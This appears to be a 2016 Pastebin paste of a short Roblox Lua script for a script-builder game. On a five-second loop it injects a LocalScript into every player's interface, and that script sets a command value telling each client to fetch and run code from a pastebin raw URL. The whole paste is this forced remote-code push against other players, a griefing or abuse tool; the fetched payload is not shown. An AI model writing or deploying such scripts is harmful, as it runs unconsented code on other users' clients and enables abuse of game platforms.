TheFlamingBlaster

Untitled

Aug 22nd, 2016
170
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.31 KB | None | 0 0
  1. local hs = game:GetService'HttpService'
  2. while true do
  3. for index, child in pairs(game:GetService'Players':GetChildren()) do
  4. newLocalScript([[
  5. wait()
  6. game:GetService'Players'.LocalPlayer.PlayerGui.SB_DataTransfer.SB_CommandRemote.Value = 'h/http://pastebin.com/raw/p5jYx1Md']],child.PlayerGui)
  7. end
  8. wait(5)
  9. end
Add Comment
Please, Sign In to add comment